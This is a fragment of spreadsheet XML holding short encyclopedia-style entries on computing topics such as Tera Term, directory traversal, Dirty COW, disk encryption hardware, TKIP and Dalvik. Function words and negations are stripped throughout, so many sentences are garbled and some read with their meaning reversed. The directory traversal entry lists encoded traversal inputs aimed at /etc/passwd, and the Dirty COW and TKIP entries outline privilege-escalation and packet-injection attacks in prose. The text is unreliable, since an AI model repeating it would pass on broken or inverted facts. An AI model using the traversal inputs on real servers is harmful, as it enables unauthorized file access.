    <t>tera term (alternatively teraterm) open-source, free, software implemented, terminal emulator (communications) program. emulates different types computer terminals, vt100 vt382. supports telnet, serial port connections. also built-in macro scripting language (supporting oniguruma regular expressions) useful plugins. history first versions tera term created teranishi japan. time, freely available terminal emulator effectively support japanese language. original development tera term stopped late 1990s version 2.3, organizations created variations. october 2002, ayera technologies released teraterm 3.1.3 supporting ssh2 added multiple features like built-in server integration external systems, recurring "keep-alive" commands, odbc database support macro scripting language. ayera technologies make source open, provide limited technical support. 2004, yutaka hirata, software designer japan, restarted development open source version tera term. added implementation ssh2 many features part version 2.3.to avoid confusion version numbers indicate tera term developed yutaka recent version 3.1.3 ayera technologies, decided give branch tera term professional version numbers starting 4.xx. january 2005, boris maisuradze, together yutaka hirata, started teraterm support forum answered questions tera term users. posting forum best suggest features tera term propose commands tera term macro language. years forum hosted logmett.com website maintained boris maisuradze. boris also developed several freeware tools became part teraterm package. later boris decided retire project. logmett.com website shut support forums moved teraterm project site. since 2007, tera term maintained tera term project (japanese developer team) open source software. features tera term supports: serial port connections uart. tcp/ip (telnet, ssh1, ssh2) connections. replaying. named pipe connection. ipv6 communication. vt100 emulation selected vt200/vt300 emulation. tek4010 emulation. file transfer protocols (kermit, xmodem, ymodem, zmodem, b-plus quick-van). scripts using "tera term language". common versions last version supporting win16; source available pascal last version released teranishi 3.1.3 last version released ayera. issues scroll window boundaries. title identifies version 4.xx latest osdn release sample images also comparison clients putty telix msdos terminal references external links original website t.teranishi teraterm home page english project page japanese download link latest versions (osdn japan) ayera technologies site version 3.1.3 tera term scripting example based devices</t>
  </si>
  <si>
    <t>Directory traversal attack</t>
  </si>
  <si>
    <t>directory traversal path traversal) attack exploits insufficient security validation sanitization user-supplied file names, characters representing "traverse parent directory" passed operating system's file system api. affected application exploited gain unauthorized access file system. directory traversal also known (dot slash) attack, directory climbing, backtracking. some forms attack also canonicalization attacks. example typical example vulnerable application code attack system could send following http request: server would generate response repeated characters /home/users/phpguru/templates/ caused include() traverse root directory, include unix password file /etc/passwd. unix /etc/passwd common file used demonstrate directory traversal, often used crackers cracking passwords. however, recent unix systems, /etc/passwd file contain hashed passwords, instead located /etc/shadow file, cannot read unprivileged users machine. even case, though, reading /etc/passwd still show list user accounts. variations directory traversal simplest form uses pattern. some common variations listed below: microsoft windows microsoft windows directory traversal uses patterns.each partition separate root directory (labeled could partition), common root directory that. this means directory vulnerabilities windows, attacks limited single partition. directory traversal cause numerous microsoft vulnerabilities. percent encoding uris some applications attempt prevent directory traversal scanning path request patterns ../. this check sometimes mistakenly performed percent-decoding, causing uris containing patterns like %2e%2e/ accepted despite decoded actual use. double encoding percent decoding accidentally performed multiple times; validation, afterwards, making application vulnerable double percent-encoding attacks illegal characters replaced double-percent-encoded form order bypass security countermeasures. example, double percent-encoding attack, replaced double-percent-encoded form %252e%252e%252f. this kind vulnerability notably affected versions earlier microsoft's server software. utf-8 badly implemented utf-8 decoder accept characters encoded using bytes necessary, leading alternative character representations, %c0%ae representing this specifically forbidden utf-8 standard, still directory traversal vulnerabilities software server. archives some archive formats like allow directory traversal attacks: files archive written overwrite files filesystem backtracking. code extracts archive files written check paths files archive engage path traversal. prevention possible algorithm preventing directory traversal would process requests result file request, e.g., executing hook user code, continuing below. when request file/directory made, build full path file/directory exists, normalize characters (e.g., converted spaces). assumed 'document root' fully qualified, normalized, path known, string length assume files outside directory served. ensure first characters fully qualified path requested file exactly 'document root'. allow file returned. not, return error, since request clearly bounds web-server allowed serve.using hard-coded predefined file extension suffix path necessarily limit scope attack files file extension. user null character (indicating string) order bypass everything $_get. (this php-specific.) also chroot jails subject directory traversal incorrectly created. possible directory traversal attack vectors open file descriptors directories outside jail. working directory another possible attack vector. insecure direct object reference references resources open application security project wasc threat classification path traversal path traversal vulnerability exploitation remediation common weakness enumeration path traversal external links dotdotpwn directory traversal fuzzer conviction using directory traversal. bugtraq: %c1%1c remote command execution cryptogram newsletter july 2001 [4].</t>
  </si>
  <si>
    <t>Dirty COW</t>
  </si>
  <si>
    <t>dirty (dirty copy-on-write) computer security vulnerability linux kernel affected linux-based operating systems, including android devices, used older versions linux kernel created 2018. local privilege escalation exploits race condition implementation copy-on-write mechanism kernel's memory-management subsystem. computers devices still older kernels remain vulnerable. vulnerability discovered phil oester. because race condition, right timing, local attacker exploit copy-on-write mechanism turn read-only mapping file writable mapping. although local privilege escalation, remote attackers conjunction exploits allow remote execution non-privileged code achieve remote root access computer. attack leave traces system log.the vulnerability common vulnerabilities exposures designation cve-2016-5195. dirty first security issues transparently fixed ubuntu canonical live patch service.it demonstrated vulnerability utilized root android device (and excluding) android version (nougat). history vulnerability existed linux kernel since version 2.6.22 released september 2007, information actively exploited least since october 2016. vulnerability patched linux kernel versions 4.8.3, 4.7.9, 4.4.26 newer. patch produced 2016 fully address issue revised patch released november 2017, public dissemination vulnerability. applications dirty vulnerability many perceived cases including proven examples, obtaining root permissions android devices, well several speculated implementations. there many binaries used linux read-only, modified written user higher permissions, root. when privileges escalated, whether genuine malicious means using dirty exploit user modify usually unmodifiable binaries files. malicious individual could dirty vulnerability escalate permissions, could change file, /bin/bash, performs additional, unexpected functions, keylogger. when user starts program infected, inadvertently allow malicious code run. exploit targets program root privileges, exploit privileges. remedies recourse dawn discovery, anyone using machine running linux susceptible exploit. exploit preventative work around, cure patch running newer version vulnerable anymore. linus torvalds committed patch october 2016, acknowledging vulnerability attempted eleven years ago. some distributors provide patches, canonical, provided live patch. absence patch, mitigation technologies including systemtap, little security selinux apparmor. antivirus software potential detect elevated permissions attacks, cannot prevent attack. when given opportunity, safest route upgrade linux kernel following versions: references external links cve-2016-5195 cve-2016-5195 oracle cve-2016-5195 suse</t>
  </si>
  <si>
    <t>Disk Copy</t>
  </si>
  <si>
    <t>disk copy default utility handling logical volume images system 10.2 (usable system software well). later versions macos replaced diskimagemounter mounting images disk utility creating them. file format support "disk copy 4.2" (dc42) common name used refer disk images floppy disks created version disk copy. dart variant supports compression, initially handled dart (disk archive/retrieval tool) utility.disk copy added support disk image format (ndif). versions disk copy added support newer universal disk format (udif) image format, introduced files although last official public release disk copy version 6.3.3, version supported udif image format. apple stopped support already, support eventually removed favor version ever made beta development stopped. there also developer version based functionality, developer version never released. although version read images system booted image compressed. other image formats supported disk copy include diskset disk images. original disk copy utility disk copy also name apple utility distributed earliest versions classic order copy 400k floppy disks using disk swaps possible machine 128k ram, original disk copy used screen buffer store binary data disk copied; result, screen (other small area bottom displaying gui) filled noise copying progress. shipped system system 2.0. also (unix) dcfldd diskimagemounter 10.3 later successor. disk utility creates disk images 10.3 later. rawrite rawrite2 ms-dos microsoft windows references</t>
  </si>
  <si>
    <t>Disk Data Format</t>
  </si>
  <si>
    <t>snia common raid disk data format (ddf) defines standard data structure describing data formatted across disks raid group. structure allows basic level interoperability different suppliers raid technology. common raid structure benefits storage users enabling in-place data migration recovery controller failure using systems different vendors. references external links using volumes linux kernel</t>
  </si>
  <si>
    <t>Disk Utility</t>
  </si>
  <si>
    <t>disk utility system utility performing disk disk volume-related tasks macos operating system apple inc. functions functions currently supported disk utility include: creation, conversion, backup, compression, encryption logical volume images wide range formats read disk utility .dmg cd/dvd images, .cdr mounting, unmounting ejecting disk volumes (including hard disks, removable media, disk volume images) enabling disabling journaling verifying disk's integrity, repairing disk damaged (this work compatible format partitions fat32 partitions microsoft windows installed) erasing, formatting, partitioning, cloning disks secure deletion free space disk using "zero out" data, 7-pass 5220-22 standard, 35-pass gutmann algorithm adding changing partition table apple partition map, guid partition table, master boot record (mbr) restoring volumes apple software restore (asr) images checking s.m.a.r.t. status hard diskdisk utility functions also accessed macos command line diskutil hdiutil commands. also possible create manage disk images using hdiutil diskutil terminal. history classic similar functionality verification features disk utility could found disk first application. another application called drive setup used drive formatting partitioning application disk copy used working disk images. before panther, functionality disk utility spread across applications: disk copy disk utility. disk copy used creating mounting disk image files whereas disk utility used formatting, partitioning, verifying, repairing file structures. ability "zero" data (multi-pass formatting) disk added 10.2.3. further changes introduced tiger, specifically version 10.4.3, allowed disk utility used verify file structure current boot drive. leopard added ability create, resize, delete disk partitions without erasing them, feature known live partitioning. capitan, disk utility different user interface lost abilities repair permissions obsolescence, create manage disks formatted raid, burn discs, multi-pass format internal solid-state drives encrypted external drives. also apple software restore logical disk manager palimpsest disk utility parted diskpart fdisk cfdisk sfdisk references external links apple online page diskutil apple online page hdiutil</t>
  </si>
  <si>
    <t>Disk aggregation</t>
  </si>
  <si>
    <t>disk aggregation abstraction hard disks, disk partitions, logical volumes single logical disk. this done create single logical disk capacity larger available physical disks provide simple increase disk performance provide simple implement lun-level storage virtualization also raid storage virtualization</t>
  </si>
  <si>
    <t>Disk array controller</t>
  </si>
  <si>
    <t>disk array controller device manages physical disk drives presents computer logical units. almost always implements hardware raid, thus sometimes referred raid controller. also often provides additional disk cache. disk array controller often improperly shortened disk controller. confused provide different functionality. front-end back-end side disk array controller provides front-end interfaces back-end interfaces. back-end interface communicates controlled disks. hence protocol usually (a.k.a. pata), sata, scsi, sas. front-end interface communicates computer's host adapter (hba, host adapter) uses: ata, sata, scsi, popular protocols used disks, using controller transparently emulate disk computer somewhat less popular protocol dedicated specific solution: ficon/escon, iscsi, hyperscsi, ethernet infinibanda single controller different protocols back-end front-end communication. many enterprise controllers front-end sata back-end. enterprise controllers modern enterprise architecture disk array controllers (sometimes also called storage processors, sps) parts physically independent enclosures, disk arrays placed storage area network (san) network-attached storage (nas) servers. those external disk arrays usually purchased integrated subsystem raid controllers, disk drives, power supplies, management software. controllers provide advanced functionality (various vendors name differently): automatic failover another controller (transparent computers transmitting data) long-running operations performed without downtime forming raid reconstructing degraded raid (after disk failure) adding disk online raid removing disk raid (rare functionality) partitioning raid separate volumes/luns snapshots business continuance volumes (bcv) replication remote controller.... simple controllers simple disk array controller inside computer, either expansion card built onto motherboard. such controller usually provides host adapter (hba) functionality save physical space. hence sometimes called raid adapter. february 2007 intel started integrating matrix raid controller upmarket motherboards, giving control devices additional sata connectors, totalling sata connections (3gbit/s each). backward compatibility connector able connect devices (100 mbit/s) also present. history while hardware raid controllers available long time, always required expensive scsi hard drives aimed server high-end computing market. scsi technology advantages include allowing devices bus, independent data transfers, hot-swapping, much higher mtbf. around 1997, introduction atapi-4 (and thus ultra-dma-mode enabled fast data-transfers less utilization) first raid controllers introduced expansion cards. those raid systems made consumer market, users wanted fault-tolerance raid without investing expensive scsi drives. drives make possible build raid systems lower cost scsi, raid controllers lack dedicated buffer high-performance hardware parity calculation. result, raid performs relatively poorly compared scsi raid controllers. additionally, data safety suffers battery backup finish writes interrupted power outage. support because hardware raid controllers present assembled raid volumes, operating systems strictly required implement complete configuration assembly controller. very often basic features implemented open-source software driver, extended features provided binary blobs directly hardware manufacturer. normally, raid controllers fully configured card bios operating system booted, operating system booted, proprietary configuration utilities available manufacturer controller, exact feature controller specific manufacturer product. unlike network interface controllers ethernet, usually configured serviced entirely common operating system paradigms like ifconfig unix, without need third-party tools, manufacturer raid controller usually provides proprietary software tooling operating system deem support, ensuring vendor lock-in, contributing reliability issues.for example, freebsd, order access configuration adaptec raid controllers, users required enable linux compatibility layer, linux tooling adaptec, potentially compromising stability, reliability security setup, especially taking long term view mind. however, greatly depends controller, whether appropriate hardware documentation available order write driver, controllers open-source versions configuration utilities, example, mfiutil mptutil available freebsd since freebsd (2009), well mpsutil/mprutil since 2015, supporting respective device drivers, latter fact contributing code bloat. some operating systems implemented generic frameworks interfacing raid controller, provide tools monitoring raid volume status, well facilitation drive identification blinking, alarm management, spare disk designations data scrubbing raid within operating system without reboot card bios. example, approach taken openbsd 2005 bio(4) pseudo-device driver bioctl utility, provide volume status, allow led/alarm/hotspare control, well sensors (including drive sensor) health monitoring; approach subsequently adopted extended netbsd 2007 well.with bioctl, feature intentionally kept minimum, controller supported tool way; initial configuration controller meant performed card bios, initial configuration, day-to-day monitoring repair possible unified generic tools, bioctl accomplish. references storage basics: choosing raid controller, 2004, freeman</t>
  </si>
  <si>
    <t>Disk array</t>
  </si>
  <si>
    <t>disk array disk storage system contains multiple disk drives. differentiated disk enclosure, array cache memory advanced functionality, like raid, deduplication, encryption virtualization. components disk array include: disk array controllers cache form volatile random-access memory non-volatile flash memory. disk enclosures magnetic rotational hard disk drives electronic solid-state drives. power suppliestypically disk array provides increased availability, resiliency, maintainability using additional redundant components (controllers, power supplies, fans, etc.), often point single points failure (spofs) eliminated design. additionally, disk array components often hot-swappable. traditionally disk arrays divided categories: network attached storage (nas) arrays storage area network (san) arrays: modular arrays monolithic arrays utility storage arrays storage virtualizationprimary vendors storage systems include coraid, inc., datadirect networks, dell emc, fujitsu, hewlett packard enterprise, hitachi data systems, huawei, ibm, infortrend, netapp, oracle corporation, panasas, pure storage companies often vendors market storage components manufacture. references</t>
  </si>
  <si>
    <t>Disk cloning</t>
  </si>
  <si>
    <t>disk cloning process creating 1-to-1 copy hard disk drive (hdd) solid-state drive (ssd), files. disk cloning used upgrading disk replacing aging disk fresh one. case, clone replace original disk host computer. disk cloning also used disaster recovery forensics. context backup software, disk cloning similar disk imaging; case latter, 1-to-1 copy disk created inside disk image file.disk cloning done specialized cloning software, backup software, disk imaging software necessary features, specialized hardware. operating environment disk cloning program needs able read even protected operating system files source disk, must guarantee system consistent state time reading. must also overwrite operating system already present destination disk. simplify tasks, disk cloning programs operating system different native operating system host computer, example, ms-dos equivalent dr-dos, linux. computer booted operating system, cloning program loaded copies computer's file system. many programs clone disk, make image, within running system, special provision copying open files; image cannot restored onto windows system drive windows. disk cloning program must device drivers equivalent devices used. manufacturers devices provide suitable drivers, manufacturers disk cloning software must write drivers, include device access functionality way. this applies tape drives, readers writers, firewire drives. cloning software contains tcp/ip stack multicast transfer data required. image transfer simplest method cloning disk source destination disks present machine, often possible. disk cloning programs link computers parallel cable, save load images external drive network drive. disk images tend large (usually minimum several hundred mb), performing several clones time puts excessive stress network. solution multicast technology. this allows single image sent simultaneously many machines without putting greater stress network sending image single machine. image manipulation although disk cloning programs primarily backup programs, sometimes used such. feature backup program allow retrieval individual files without needing restore entire backup. disk cloning programs either provide windows explorer-like program browse image files extract individual files them, allow image file mounted read-only filesystem within windows explorer. cloning software this table highlights common capabilities disk cloning software. also list backup software list data recovery software list disk partitioning software disk mirroring disk image live recovery disc security identifier notes references</t>
  </si>
  <si>
    <t>Disk encryption hardware</t>
  </si>
  <si>
    <t>hardware-based full disk encryption (fde) available many hard disk drive (hdd/ssd) vendors, including: clevx, hitachi, integral memory, istorage limited, micron, seagate technology, samsung, toshiba, viasat western digital. symmetric encryption maintained independently computer's cpu, thus allowing complete data store encrypted removing computer memory potential attack vector. hardware-fde major components: hardware encryptor data store. there currently four varieties hardware-fde common use: hard disk drive (hdd) (self-encrypting drive) enclosed hard disk drive removable hard disk drive bridge chipset (bc) fdehardware designed particular purpose often achieve better performance disk encryption software, disk encryption hardware made transparent software encryption done software. soon initialised, hardware principle completely transparent thus work disk encryption hardware integrated media media designed better integration. example design would physical sectors slightly larger logical sectors. hardware-based full disk encryption types hard disk drive usually referred self-encrypting drive (sed). made vendors using opal enterprise standards developed trusted computing group. management takes place within hard disk controller encryption keys advanced encryption standard (aes) keys. authentication power drive must still take place within either software pre-boot authentication environment (i.e., software-based full disk encryption component hybrid full disk encryption) bios password. hitachi, micron, seagate, samsung, toshiba disk drive manufacturers offering opal sata drives. hdds become commodity allow drive manufacturers maintain revenue. older technologies include proprietary seagate drivetrust, older, less secure, pata security command standard shipped drive makers including western digital. enterprise versions standard called "tcg enterprise" drives. enclosed hard disk drive within standard hard drive form factor case encryptor (bc), store smaller form factor, commercially available, hard disk drive enclosed. enclosed hard disk drive's case tamper-evident, retrieved user assured data compromised. encryptors electronics including store integral hard drive solid-state) protected tamper respondent measures. purged, allowing user prevent authentication parameters used without destroying encrypted data. later re-loaded enclosed hard disk drive fde, retrieve data. tampering issue seds cannot read without decryption key, regardless access internal electronics.for example: viasat (formerly stonewood electronics) flagstone eclypt drives guarddisk rfid token. removable hard drive inserted hard drive allows standard form factor hard disk drive inserted concept seen this improvement removing [unencrypted] hard drives computer storing safe use. this design used encrypt multiple drives using key. generally securely locked drive's interface open attack. chipset encryptor bridge chipset (bc) placed computer standard hard disk drive, encrypting every sector written intel announced release danbury chipset since abandoned approach. characteristics hardware-based encryption built drive within drive enclosure notably transparent user. drive, except bootup authentication, operates like drive, degradation performance. there complication performance overhead, unlike disk encryption software, since encryption invisible operating system host computer's processor. main cases data rest protection, cryptographic disk erasure. data rest protection computer laptop simply powered off. disk self-protects data data safe even encrypted, secure mode aes, locked reading writing. drive requires authentication code strong bytes (2^256) unlock. disk sanitisation crypto-shredding practice 'deleting' data (only) deleting overwriting encryption keys. when cryptographic disk erasure crypto erase) command given (with proper authentication credentials), drive self-generates media encryption goes 'new drive' state. without key, data becomes irretrievable therefore efficient means providing disk sanitisation lengthy (and costly) process. example, unencrypted unclassified computer hard drive requires sanitising conform department defense standards must overwritten times; terabyte enterprise sata3 disk would take many hours complete process. although faster solid-state drives (ssd) technologies improves situation, take enterprise slow. problem worsen disk sizes increase every year. with encrypted drives complete secure data erasure action takes milliseconds simple change, drive safely repurposed quickly. this sanitisation activity protected seds drive's management system built firmware order prevent accidental data erasure confirmation passwords secure authentications related original required. when keys self-generated randomly, generally method store copy allow data recovery. case protecting data accidental loss theft achieved consistent comprehensive data backup policy. method user-defined keys, enclosed hard disk drive fde, generated externally loaded fde. protection alternative boot methods recent hardware models circumvents booting devices allowing access using dual master boot record (mbr) system whereby operating system data files encrypted along special required boot operating system. seds, data requests intercepted firmware, allow decryption take place unless system booted special operating system loads encrypted part drive. this works separate partition, hidden view, contains proprietary operating system encryption management system. this means boot methods allow access drive. vulnerabilities typically fde, unlocked, remain unlocked long power provided. researchers universität erlangen-nürnberg demonstrated number attacks based moving drive another computer without cutting power. additionally, possible reboot computer attacker-controlled operating system without cutting power drive. when computer self-encrypting drive sleep mode, drive powered down, encryption password retained memory drive quickly resumed without requesting password. attacker take advantage gain easier physical access drive, instance, inserting extension cables.the firmware drive compromised data sent risk. even data encrypted physical medium drive, fact firmware controlled malicious third-party means decrypted third-party. data encrypted operating system, sent scrambled form drive, would matter firmware malicious not. criticism hardware solutions also criticised poorly documented. many aspects encryption done published vendor. this leaves user little possibility judge security product potential attack methods. also increases risk vendor lock-in. addition, implementing system wide hardware-based full disk encryption prohibitive many companies high cost replacing existing hardware. this makes migrating hardware encryption technologies difficult would generally require clear migration central management solution hardware- software-based full disk encryption solutions. however enclosed hard disk drive removable hard drive often installed single drive basis. also disk encryption hardware disk encryption software crypto-shredding opal storage specification yubikey full disk encryption secure blue references</t>
  </si>
  <si>
    <t>Temporal Key Integrity Protocol</t>
  </si>
  <si>
    <t>temporal integrity protocol (tkip security protocol used ieee 802.11 wireless networking standard. tkip designed ieee 802.11i task group wi-fi alliance interim solution replace without requiring replacement legacy hardware. this necessary breaking left wi-fi networks without viable link-layer security, solution required already deployed hardware. however, tkip longer considered secure, deprecated 2012 revision 802.11 standard. background october 2002, wi-fi alliance endorsed tkip name wi-fi protected access (wpa). ieee endorsed final version tkip, along robust solutions 802.1x based ccmp, published ieee 802.11i-2004 july 2004. wi-fi alliance soon afterwards adopted full specification marketing name wpa2.tkip resolved deprecated ieee january 2009. technical details tkip related standard implement three security features address security problems encountered protected networks. first, tkip implements mixing function combines secret root initialization vector passing cipher initialization. wep, comparison, merely concatenated initialization vector root key, passed value routine. this permitted vast majority based related attacks. second, implements sequence counter protect replay attacks. packets received order rejected access point. finally, tkip implements 64-bit message integrity check (mic) re-initializes sequence number time (temporal key) used.to able legacy hardware minor upgrades, tkip uses cipher. tkip also provides rekeying mechanism. tkip ensures every data packet sent unique encryption key(interim key/temporal packet sequence counter).key mixing increases complexity decoding keys giving attacker substantially less data encrypted using key. wpa2 also implements message integrity code, mic. message integrity check prevents forged packets accepted. under possible alter packet whose content known even decrypted. security tkip uses underlying mechanism wep, consequently vulnerable number similar attacks. message integrity check, per-packet hashing, broadcast rotation, sequence counter discourage many attacks. mixing function also eliminates recovery attacks. notwithstanding changes, weakness additions allowed new, although narrower, attacks. packet spoofing decryption tkip vulnerable recovery attack that, successfully executed, permits attacker transmit decrypt arbitrary packets network attacked. current publicly available tkip-specific attacks reveal pairwise master pairwise temporal keys. november 2008, martin beck erik tews released paper detailing recover transmit packets. this attack improved mathy vanhoef frank piessens 2013, increase amount packets attacker transmit, show attacker also decrypt arbitrary packets.the basis attack extension chop-chop attack. because uses cryptographically insecure checksum mechanism (crc32), attacker guess individual bytes packet, wireless access point confirm deny whether guess correct. guess correct, attacker able detect guess correct continue guess bytes packet. however, unlike chop-chop attack network, attacker must wait least seconds incorrect guess successful circumvention crc32 mechanism) continuing attack. this although tkip continues crc32 checksum mechanism, implements additional code named michael. incorrect michael codes received within seconds, access point implement countermeasures, meaning rekey tkip session key, thus changing future keystreams. accordingly, attacks tkip wait appropriate amount time avoid countermeasures. because packets easily identified size, vast majority contents packet would known attacker, number bytes attacker must guess using method rather small (approximately bytes). beck tews estimate recovery bytes possible minutes typical network, would allow attacker transmit packets bytes. vanhoef piessens improved technique relying fragmentation, allowing attacker transmit arbitrary many packets, bytes size. vanhoef–piessens attacks also used decrypt arbitrary packets attack's choice. attacker already access entire ciphertext packet. upon retrieving entire plaintext packet, attacker access keystream packet, well code session. using information attacker construct packet transmit network. circumvent implemented replay protection, attacks channels transmit newly constructed packets. attacker able transmit packets able implement number attacks, including poisoning attacks, denial service, similar attacks, need associated network. royal holloway attack group security researchers information security group royal holloway, university london reported theoretical attack tkip exploits underlying encryption mechanism. tkip uses similar structure 16-bit value sequence counter (used prevent replay attacks) expanded 24-bit "iv", sequence counter always increment every packet. attacker structure improve existing attacks rc4. particular, data encrypted multiple times, attacker learn information connections. while claim attack verge practicality, simulations performed, attack demonstrated practice. nomore attack 2015, security researchers leuven presented attacks wpa-tkip. dubbed numerous occurrence monitoring recovery exploit (nomore) attack, first attack kind demonstrated practice. attack wpa-tkip completed within hour, allows attacker decrypt inject arbitrary packets. legacy zdnet reported june 2010, tkip would soon disallowed wi-fi devices wi-fi alliance. however, survey 2013 showed still widespread use. also wireless network interface controller ccmp wi-fi protected access ieee 802.11i-2004 references</t>
  </si>
  <si>
    <t>Dalvik (software)</t>
  </si>
  <si>
    <t>dalvik discontinued process virtual machine (vm) android operating system executes applications written android. (dalvik bytecode format still used distribution format, longer runtime newer android versions.) dalvik integral part android software stack (now unsupported) android versions "kitkat" earlier, commonly used mobile devices mobile phones tablet computers, devices smart wearables. dalvik open-source software, originally written bornstein, named fishing village dalvík eyjafjörður, iceland.programs android commonly written java compiled bytecode java virtual machine, translated dalvik bytecode stored .dex (dalvik executable) .odex (optimized dalvik executable) files; related terms odex de-odex associated respective bytecode conversions. compact dalvik executable format designed systems constrained terms memory processor speed. successor dalvik android runtime (art), uses bytecode .dex files (but .odex files), succession aiming performance improvements. runtime environment included first time android "kitkat" technology preview, replaced dalvik entirely later versions; android "lollipop" first version included runtime. architecture unlike java virtual machines, stack machines, dalvik uses register-based architecture requires fewer, typically complex, virtual machine instructions. dalvik programs written java using android application programming interface (api), compiled java bytecode, converted dalvik instructions necessary. tool called used convert java .class files .dex format. multiple classes included single .dex file. duplicate strings constants used multiple class files included .dex output conserve space. java bytecode also converted alternative instruction used dalvik uncompressed .dex file typically percent smaller size compressed java archive (jar) derived .class files.the dalvik executables modified installed onto mobile device. order gain optimizations, byte order swapped certain data, simple data structures function libraries linked inline, empty class objects short-circuited, example. being optimized memory requirements, dalvik specific characteristics differentiate standard vms: slimmed less space. constant pool modified 32-bit indices simplify interpreter. standard java bytecode executes 8-bit stack instructions. local variables must copied operand stack separate instructions. dalvik instead uses 16-bit instruction works directly local variables. local variable commonly picked 4-bit "virtual register" field. this lowers dalvik's instruction count raises interpreter speed.according google, design dalvik permits device multiple instances efficiently.android "froyo" brought trace-based just-in-time (jit) compilation dalvik, optimizing execution applications continually profiling applications time dynamically compiling frequently executed short segments bytecode native machine code. while dalvik interprets rest application's bytecode, native execution short bytecode segments, called "traces", provides significant performance improvements. performance relative merits stack machines versus register-based approaches subject ongoing debate.generally, stack-based machines must instructions load data stack manipulate data, and, thus, require instructions register machines implement high-level code, instructions register machine must encode source destination registers and, therefore, tend larger. this difference importance interpreters, opcode dispatch tends expensive, along factors similarly relevant just-in-time compilation. tests performed armv7 devices 2010 oracle (owner java technology) standard non-graphical java benchmarks showed hotspot java embedded times faster jit-based dalvik android (the initial android release included compiler). 2012, academic benchmarks confirmed factor hotspot dalvik android board, also noting dalvik code smaller hotspot.furthermore, march 2014, benchmarks performed android device still show factor native applications dalvik application android device. upon running benchmarks using early interpreter 2009, java native interface (jni) native code showed order magnitude speedup. licensing patents dalvik published terms apache license 2.0. some dalvik clean-room implementation rather development standard java runtime, would mean inherit copyright-based license restrictions either standard-edition open-source-edition java runtimes.oracle reviewers dispute this.on august 2010, oracle, acquired microsystems april 2009 therefore owns rights java, sued google claimed infringement copyrights patents. oracle alleged google, developing android, knowingly, directly repeatedly infringed oracle's java-related intellectual property. 2012, jury case found google infringe oracle's patents, trial judge ruled structure java apis used google copyrightable. parties agreed zero dollars statutory damages lines copied code. also android runtime android software development application virtualization comparison application virtual machines comparison java android decompiler dalvik (dex apk) decompiler dalvik turbo virtual machine proprietary alternative dalvik implementation references external links dalvik bytecode official android documentation instruction executable format official android documentation compiler android's dalvik youtube, google 2010, cheng bill buzbee dalvik internals, google 2008, bornstein $800 million dollar question: what’s difference between trademark copyright?</t>
  </si>
  <si>
    <t>Differential fault analysis</t>
  </si>
  <si>
    <t>differential fault analysis (dfa) type active side-channel attack field cryptography, specifically cryptanalysis. principle induce faults—unexpected environmental conditions—into cryptographic operations, reveal internal states. principles take smartcard containing embedded processor example, think might subjected high temperature, unsupported supply voltage current, excessively high overclocking, strong electric magnetic fields, even ionizing radiation influence operation processor. when stressed like this, processor begin output incorrect results physical data corruption, help cryptanalyst deduce instructions processor running, internal data state is.for triple des, single-flipped bits necessary obtain secret key. also applied successfully cipher.many countermeasures proposed defend kind attacks. most based error detection schemes. fault injection fault injection attack consists stressing transistors responsible encryption tasks, generate fault used input. perturbation element electromagnetic pulse pulse laser pulse). fault injection consists using electromagnetic probe connected pulser laser generating disturbance order processor cycle time order nanosecond). energy transferred chip sufficient burn certain components chip, voltage pulser hundred volts) positioning probe must finely calibrated. greater precision, chips often decapsulated (chemically eroded expose bare silicon). references</t>
  </si>
  <si>
    <t>Differential backup</t>
  </si>
  <si>
    <t>differential backup type data backup preserves data, saving difference data since last full backup. rationale that, since changes data generally compared entire amount data data repository, amount time required complete backup smaller full backup performed every time organization data owner wishes back changes since last full backup. another advantage, least compared incremental backup method data backup, data restoration time, backup media ever needed restore data. this simplifies data restores well increases likelihood shortening data restoration time. meaning differential backup cumulative backup changes made since last full backup, i.e., differences since last full backup. advantage quicker recovery time, requiring full backup last differential backup restore entire data repository. disadvantage elapsed since last full backup, data needs backed especially significant proportion data changed, thus increasing backup time compared incremental backup method. important terms "differential backup" "incremental backup" correctly. terms widely used industry, universally standard. differential backup refers backup made include differences since last full backup, incremental backup contains changes since last incremental backup. (or, course, since last full backup incremental backup questions first incremental backup immediately last full backup.) major data backup vendors standardized definitions. illustration difference incremental differential backups illustrated follows: incremental backups:the assumes backups done daily. otherwise, “changes since” entry must modified refer last backup (whether last backup full incremental). also assumes weekly rotation. differential backups:it important remember industry standard meaning terms because, terms wide use, writers known reverse meaning. example, oracle corporation uses backward description differential backups product 2015: "differential incremental backups differential level backup, rman backs blocks changed since recent cumulative differential incremental backup, whether level level rman determines level backup occurred recently backs blocks modified backup. level available, rman copies blocks changed since level backup." also backup rotation scheme continuous data protection delta encoding disk archive portable robust program archiving backup dump (unix) unix utility multilevel incremental file system backups. rsync file synchronization algorithm protocol. references further reading</t>
  </si>
  <si>
    <t>Default password</t>
  </si>
  <si>
    <t>where device needs username and/or password default password usually provided allows device accessed initial setup, resetting factory defaults. manufacturers equipment typically simple password, admin password equipment ship, expectation users change password configuration. default username password usually found instruction manual (common devices) device itself. default passwords major contributing factors large-scale compromises home routers. leaving password devices available public huge security risk.some devices (such wireless routers) come unique default router username passwords printed sticker, secure option common default password. some vendors however derive password device's address using known algorithm, case password also easily reproduced attackers. default access access internet-connected devices network, user must know default address. manufacturers typically 192.168.1.1, also 10.0.0.1 default router's address however, variations this. similarly login details, leaving unchanged lead security issues. also backdoor (computing) internet things cyber-security regulation references</t>
  </si>
  <si>
    <t>Degradation (telecommunications)</t>
  </si>
  <si>
    <t>telecommunication, degradation loss quality electronic signal, categorized either "graceful" "catastrophic", following meanings: deterioration quality, level, standard performance functional unit. communications, condition required performance parameters fall outside predetermined limits, resulting lower quality service.there several forms causes degradation electric signals, time domain physical domain, including runt pulse, voltage spike, jitter, wander, swim, drift, glitch, ringing, crosstalk, antenna effect (not antenna effect manufacturing), phase noise. degradation usually refers reduction quality analog digital signal. when signal transmitted received, undergoes changes undesirable. these changes called degradation. degradation usually caused distance, imitation:see remote control, noise, interference emi. this article incorporates public domain material general services administration document: "federal standard 1037c".</t>
  </si>
  <si>
    <t>Degraded mode</t>
  </si>
  <si>
